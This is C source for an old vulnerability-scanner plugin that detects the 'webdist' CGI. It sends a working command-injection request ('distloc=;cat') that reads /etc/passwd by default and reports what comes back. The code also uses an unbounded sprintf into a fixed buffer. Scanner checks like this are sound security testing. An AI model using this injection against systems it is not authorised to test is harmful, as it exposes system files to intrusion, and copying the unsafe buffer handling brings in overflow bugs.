/*
 * 
 * webdist
 *
 * This plugin was written by Renaud Deraison and is released
 * under the GPL
 *
 */
#include <includes.h>


#define NAME "webdist"
#define DESC "Determination of the presence of the 'webdist' cgi"
#define COPYRIGHT "no copyright"
#define SUMM "determines the presence of the 'webdist' cgi"


PlugExport int plugin_init(struct arglist *desc);
PlugExport int plugin_init(struct arglist *desc)
{
	plug_set_name(desc, NAME);
	plug_set_description(desc, DESC);
	plug_set_summary(desc, SUMM);
	plug_set_copyright(desc, COPYRIGHT);
	plug_set_category(desc, ACT_ATTACK);
	plug_set_family(desc, "CGI abuses");
	return(0);
}

PlugExport int plugin_run(struct arglist * args);	
PlugExport int plugin_run(struct arglist * args)
{
	if(host_get_port_state(args, 80)<=0)return(0);
	
	
	if(is_cgi_installed(args, "webdist.cgi"))
	{
	char * buffer = emalloc(4096);
	char * result;
	char * test_file = get_preference(args, "test_file");
	int soc = open_sock_tcp(args, 80);
	
	if(soc<=0)
	 /* Couldn't re-open the connection... Strange !*/
	 post_hole(args, 80, "The 'webdist' cgi is present\nRemote commands may be executed");
	else {
	  	sprintf(buffer, "GET /cgi-bin/webdist.cgi?distloc=;cat%%20%s\n",
	  	test_file?test_file:"/etc/passwd");
		send(soc, buffer, strlen(buffer), 0);
		bzero(buffer, 4096);
		read(soc, buffer, 4095);
		result = emalloc(strlen(buffer) + 100);
		sprintf(result, 
		"The 'webdist' cgi is present\nWe attempted to obtain  %s :\n%s\n", 
		test_file?test_file:"/etc/passwd",
		buffer);
		efree(&buffer);
		post_hole(args, 80, result);
		efree(&result);
		socket_close(soc);
		}
	}
	return(0);
}

